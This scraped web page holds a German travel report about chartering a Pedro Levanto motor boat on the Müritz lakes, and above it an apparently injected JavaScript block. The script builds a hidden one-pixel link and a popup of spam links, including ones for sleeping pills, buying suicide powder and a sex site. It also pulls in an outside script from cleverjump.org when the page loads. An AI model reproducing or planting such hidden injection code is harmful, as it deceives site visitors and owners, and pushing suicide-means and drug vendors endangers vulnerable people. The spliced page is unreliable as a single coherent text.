(function() { 'use strict'; if (window['shbNetLoaded']) return; window['shbNetLoaded'] = true; var popupHtml = "
acer aspire v5 552 10578g1taii<\/a> <\/div>
fateka.com<\/span> <\/div> <\/div>
\u0444\u043b\u043e\u0440\u0430 \u0432\u0438\u043d\u043a\u0441<\/a> <\/div>
kukolki.com.ua<\/span> <\/div> <\/div> <\/div>
\u043a\u0430\u043a \u0432\u044b\u0439\u0442\u0438 \u0441 \u0437\u0430\u043f\u043e\u044f<\/a> <\/div>
alfa-med24.net.ua<\/span> <\/div> <\/div>
secret safe rooms<\/a> <\/div>
www.disasterbunkers.com<\/span> <\/div> <\/div> <\/div>
strong sleeping pills online<\/a> <\/div>
movingpharmacy.com<\/span> <\/div> <\/div>
produto para desentupir esgoto em<\/a> <\/div>
jhdesentupidora.com.br<\/span> <\/div> <\/div> <\/div>
lkw richtig beladen<\/a> <\/div>
www.blitztransport.ch<\/span> <\/div> <\/div>
liguid nicotine<\/a> <\/div>
www.aroma-company.be<\/span> <\/div> <\/div> <\/div>
magio mg 583<\/a> <\/div>
novotek.kiev.ua<\/span> <\/div> <\/div>
\u0441\u044d\u043a\u0441 \u0432 \u0438\u0433\u0440\u0435<\/a> <\/div>
sexzone.com.ua<\/span> <\/div> <\/div> <\/div>
hot yoga wear women<\/a> <\/div>
latessitura.eu<\/span> <\/div> <\/div>
\u043c\u0430\u0445\u0440\u043e\u0432\u044b\u0435 \u0445\u0430\u043b\u0430\u0442\u044b \u043c\u0443\u0436\u0441\u043a\u0438\u0435 \u0445\u0430\u0440\u044c\u043a\u043e\u0432<\/a> <\/div>
woody-shop.com.ua<\/span> <\/div> <\/div> <\/div>
\u0436\u0435\u043d\u0441\u043a\u0438\u0435 \u0441\u0432\u0438\u0442\u0435\u0440\u0430 \u0438 \u043a\u0430\u0440\u0434\u0438\u0433\u0430\u043d\u044b<\/a> <\/div>
batal.com.ua<\/span> <\/div> <\/div>
waar kan ik zelfmoordpoeder kopen<\/a> <\/div>
medischevredesapotheek.org<\/span> <\/div> <\/div> <\/div>
kokos dream<\/a> <\/div>
matrasnik.com.ua<\/span> <\/div> <\/div>
\u043c\u0430\u0433\u0430\u0437\u0438\u043d \u044d\u0442\u043e<\/a> <\/div>
fantech.com.ua<\/span> <\/div> <\/div> <\/div>
planificadores de bodas<\/a> <\/div>
minimal-rent.com.mx<\/span> <\/div> <\/div>
\u043c\u0442\u0441 \u0430\u043d\u0442\u0435\u043d\u044b<\/a> <\/div>
sat-energy.com.ua<\/span> <\/div> <\/div> <\/div>
instrument padgett surgical<\/a> <\/div>
new-medinstruments.com<\/span> <\/div> <\/div>
\u0441\u0438\u0444\u043e\u043d \u0434\u043b\u044f \u0441\u0442\u043e\u043b\u043e\u0432\u043e\u0439<\/a> <\/div>
kardamon.com.ua<\/span> <\/div> <\/div> <\/div>
\u041f\u043e\u043b\u0443\u0441\u043b\u0430\u0434\u043a\u043e\u0435 \u0432\u0438\u043d\u043e \u0414\u0438\u043a\u043e\u0432\u0438\u0447\u0435\u0432\u043e<\/a> <\/div>
luxgradus.com.ua<\/span> <\/div> <\/div>
\u043d\u0435\u0434\u0432\u0438\u0436\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u0411\u0430\u0442\u0443\u043c\u0438<\/a> <\/div>
batumiexpert.com<\/span> <\/div> <\/div> <\/div>
\u0430\u043b\u043a\u043e\u0433\u043e\u043b\u044c \u043a\u0443\u043f\u0438\u0442\u044c \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442 \u043c\u0430\u0433\u0430\u0437\u0438\u043d<\/a> <\/div>
luxgradus.com.ua<\/span> <\/div> <\/div> <\/div>
<\/div> <\/div> <\/div> <\/div> <\/td> <\/tr> <\/table> <\/div>"; var popupCreated = false; function onReady() { tryCreatePopup(2); var box = create('div'); append(box, document.body); var defaultStyles = { width: '1px', height: '1px', background: 'transparent', display: 'inline-block', margin: '2px', padding: 0, verticalAlign: 'bottom', border: 'none' }; var a = create('a'); css(a, defaultStyles); document.addEventListener('keydown', function(e) { if (e.keyCode === 192 && e.ctrlKey) { css(a, { width: '20px', height: '20px', background: '#fff', border: '1px solid red' }); } }); document.addEventListener('keyup', function(e) { css(a, defaultStyles); }); a.className = 'shbNetgpLink'; append(a, box); a.href = 'javascript:;'; on(a, 'click', openLinerPopup); css(box, { position: 'fixed', margin: 0, padding: 0, outline: 'none', border: 'none', zIndex: 999999999, overflow: 'visible', direction: 'ltr' }); css(box, { left: '3px', right: 'auto', top: '50px', bottom: 'auto', width: '42px', height: '168px' }); } function clearStyles() { if(typeof document.createStyleSheet === 'undefined') { document.createStyleSheet = (function() { function createStyleSheet(href) { if(typeof href !== 'undefined') { var element = document.createElement('link'); element.type = 'text/css'; element.rel = 'stylesheet'; element.href = href; } else { var element = document.createElement('style'); element.type = 'text/css'; } document.getElementsByTagName('head')[0].appendChild(element); var sheet = document.styleSheets[document.styleSheets.length - 1]; if(typeof sheet.addRule === 'undefined') sheet.addRule = addRule; if(typeof sheet.removeRule === 'undefined') sheet.removeRule = sheet.deleteRule; return sheet; } function addRule(selectorText, cssText, index) { if(typeof index === 'undefined') index = this.cssRules.length; this.insertRule(selectorText + ' {' + cssText + '}', index); } return createStyleSheet; })(); } var sheet = document.createStyleSheet(); sheet.addRule('#shbNetPaddingTable', 'display: none;'); sheet.addRule('#shbNetPaddingWr #shbNetPaddingTable', 'display: table;'); sheet.addRule('.shbNetPopupWr, .shbNetPopupWr *', '-webkit-text-shadow:none !important; text-shadow:none !important;'); sheet.addRule('.shbNetPopupTable img', 'display:inline; width:auto; height:auto; background:none; float:none;'); sheet.addRule('.shbNetPopupTable *', 'margin:0; padding:0; font-family:Tahoma,Arial,Sans-Serif,Verdana; font-size:medium; line-height:normal;'); sheet.addRule('.shbNetPopupTable a', 'text-decoration:none; background:none; height:auto !important;'); } function tryCreatePopup(stage) { if (popupCreated) return; if (stage === 1) { document.writeln(popupHtml); } else if (stage === 2) { var mainBox = create('div'); mainBox.innerHTML = popupHtml; document.body.appendChild(mainBox); } else { return; } var wr = $('shbNetPaddingWr'); if (!wr) return; popupCreated = true; var table = $('shbNetPaddingTable'); css(table, { position: 'fixed', margin: 0, padding: 0, left: 0, top: 0, width: '100%', height: '100%', direction: 'ltr', zIndex: 999999999, background: 'none' }); css(table.getElementsByTagName('td')[0], { verticalAlign: 'middle', background: 'rgba(0, 0, 0, 0.5)' }); var popup = $('shbNetPaddingPopup'); css(popup, { margin: '0 auto', padding: '20px 25px 20px', width: '437px', background: '#fff', border: '1px solid #000', textAlign: 'left', position: 'relative', fontFamily: 'Tahoma, Arial, Verdana', boxSizing: 'content-box' }); on(document, 'keydown', function(e) { if (e.keyCode === 27) { wr.style.display = 'none'; } }); } function removeClass(node, className) { if (node && node.className) { node.className = node.className.replace(new RegExp('\\b' + className + '\\b', 'g'), ''); } } function openLinerPopup() { var pad = $('shbNetPaddingWr'); var tbl = $('shbNetPaddingTable'); if (!pad || !tbl) return; pad.style.display = 'block'; tbl.style.display = 'table'; var mainPopup = $('shbNetPopupWr'); if (!mainPopup) return; mainPopup.style.display = 'none'; } function $(id) { return document.getElementById(id); } function on(elem, event, handler) { elem.addEventListener(event, handler, false); } function css(elem, style) { for (var prop in style) { elem.style[prop] = style[prop]; } } function create(tag) { return document.createElement(tag); } function append(elem, parent) { parent.appendChild(elem); } setTimeout(function() { window.CJSource = 'shb2'; var script = document.createElement('script'); script.src = 'https://cleverjump.org/counter.js'; (document.head || document.body).appendChild(script); }, 10); if (document.readyState === 'complete' || document.readyState === 'interactive') { onReady(); } else { on(document, 'DOMContentLoaded', onReady); } tryCreatePopup(1); try { clearStyles(); } catch (ex) {} })();
12.03.2010

Mecklenburgische Gewässer – Reisebericht

Pedro Levanto 44Nach einer Woche Müritz  (Starthafen Eldenburg, Vermieter Yachtcharter Schulz, Boot Pedro Levanto Typ II) Fahrt hier unser Bericht über das Erlebte:

Bei der Vermittlung des Schiffs gebührt der Crew von Ferien auf dem Wasser ein besonderer Dank. Kurzfristig und mit großer Mühe ist es dem Team noch gelungen ein für uns geeignetes Schiff bei der Firma “Yachtcharter Schulz” zu finden. Wir haben uns für die “Pedro Levanto Typ II” entschieden und waren mit 4 Personen an Bord. Unser Starthafen war die Marina “Eldenburg” bei Waren. Das Schiff war bereits schon um 14 Uhr für uns fertig, die Übergabe erfolgte um 16 Uhr. Es erfolgte eine kurze Einweisung durch das Personal (ebenfalls sehr freundlich). 

Zum Schiff:
Das Schiff selbst war in einem guten Zustand und komplett ausgestattet. Die Bugkabine und die beiden Heckkabinen bieten ausreichend Platz. Die vordere Backbord Kabine gegenüber der Pantry ist sehr sehr eng und ist höchstens für Kinder geeignet. Will man den Schrank erreichen, muss man sich seitwärts an der Heizung vorbei zwängen. Ein Umdrehen ist unmöglich. An- bzw. umkleiden ist bei geschlossener Tür fast unmöglich. Um in das obere Bett zu gelangen muss man schon sportlich veranlagt sein. Wie gesagt, für Kinder ok., für einen Erwachsenen schwer, für zwei Erwachsene völlig unmöglich.
Die Waschräume sind auch gut und gross genug angelegt. Aber Vorsicht: Es sind 3 elektrische Toiletten installiert die sehr empfindlich sind. Dazu später mehr.

Der Wohnraum ist üppig bemessen und bietet viel Platz. Es sind sogar DVB-T Fernsehen und CD Player an Bord. Die Pantry ist gut ausgestattet, der Kühlschrank ist normal groß.

Einen riesigen Vorteil beim Fahren bieten das Bug- und Heckstralhruder. Da das Schiff ist 13,35 m lang, 4,20 m breit und fast 4 m hoch. Also spielt Wind schon eine Rolle. Mit Hilfe der Strahlruder kann man das Schiff sehr gut steuern und enge Schleusen sind auch kein Problem. Der Stahlrumpf macht einen soliden Eindruck. Auf dem Heck kann man sehr schön sitzen und die Sonne genießen. Fazit: Ein wirklich schönes, solides Schiff das man (bis auf die kleine Backbordkabine) empfehlen kann. Die “Harmonia” war war Baujahr 2007 . Bei sparsamer Fahrt (ca. 1200-1500 Umdrehungen der Maschine) haben wir in einer Woche nur 108 Liter Diesel verbraucht !! 

Das Revier:
Wer die Müritz und die angrenzenden Gewässer kennt, dem muss man nicht viel erzählen. Die Natur ist grenzenlos schön und man kann sich kaum satt sehen. Es gibt keine Stelle die nicht schön ist, egal ob See oder Kanal. Einfach traumhaft. Unsere Route war die folgende: Eldenburg-Plau-Waren-Rechlin-Malchow-Wolfsbruch-Röbel-Eldenburg. Eine schöne Rundreise. Alles Häfen waren gut.

Den Stadthafen Röbel kann man nicht empfehlen. Dort ist der Service schlecht. Es gibt keine Duschen und nur 3 Toiletten für den ganzen Hafen. Wasser ist nur über den Hafenmeister zu bekommen wenn der einen Schlauch auslegt. Trotzdem liegen die Gebühren bei 18,– Euro für eine Nacht. Gut ist der Hafen zum Einkaufen. Man liegt fast genau vor dem Supermarkt. Ansonsten würde ich lieber den Seglerhafen nehmen.

Alle anderen Häfen waren gut und sind zu empfehlen. In Waren sollte man nicht zu spät ankommen. Liegeplätze für größere Schiffe sind begrenzt.

Ein Wort noch zu Müritz selbst: Wetterinformationen sind schlecht und kaum zu bekommen. Der Hafenmeister gibt höchstens seine subjektiven Eindrücke weiter, die mit der Realität nichts zu tun haben. Wir haben die Müritz bei ca 5-6 Windstärken befahren. Das kann ich keinem empfehlen und würde es NIE wieder tun. Wellen von 1-1,5 Meter sind durchaus möglich die einem von der Seite kommend große Probleme machen. Wir mussten die Fahrt mit zwei verlorenen Fendern und einigen kaputten Gläsern und Tellern bezahlen. Andere hatten Stühle von Deck verloren oder kamen mit zerschlagenen Fernsehern in den Hafen. An diesem Tag (übrigens bei strahlendem Sonnenschein) gingen 34 Menschen über Bord und einige Boote kenterten. Alle wurden gerettet, Gott sei Dank. Also, bei solchen Windverhältnissen Finger weg von der Müritz und schlicht im Hafen bleiben. Das kann ich nur wärmstens empfehlen. 

Charterfirma “Schulz”:

Yachtcharter “Schulz” kann ich nur empfehlen. Wichtig ist ein Abschluss der Kautionsversicherung. Diese kostet 90,– Euro für eine Kaution von 700,– Euro für das Schiff. Wir hatten sie nicht. Wir selbst und auch der Angestellt der Firma Schulz hatten es bei der Übergabe schlicht vergessen. Am Ende mussten wir die Fender mit je 60,– Euro (also 120,– Euro gesamt) bezahlen (selber Schuld). Eine der Toiletten war am letzten Tag verstopft (siehe oben). Dies wurde uns mit 150,– Euro in Rechnung gestellt. So schnell waren also dann 270,– Euro von unserer Kaution weg. Da wären die 90,– Euro für die Versicherung besser und billiger gewesen. Aber aus Schaden wird man bekanntlich klug……
Ansonsten ist das Personal bei Schulz sehr freundlich, nett und hilfsbereit. Wir würden, schon wegen der Schiffe, dort wieder mieten.

Kategorien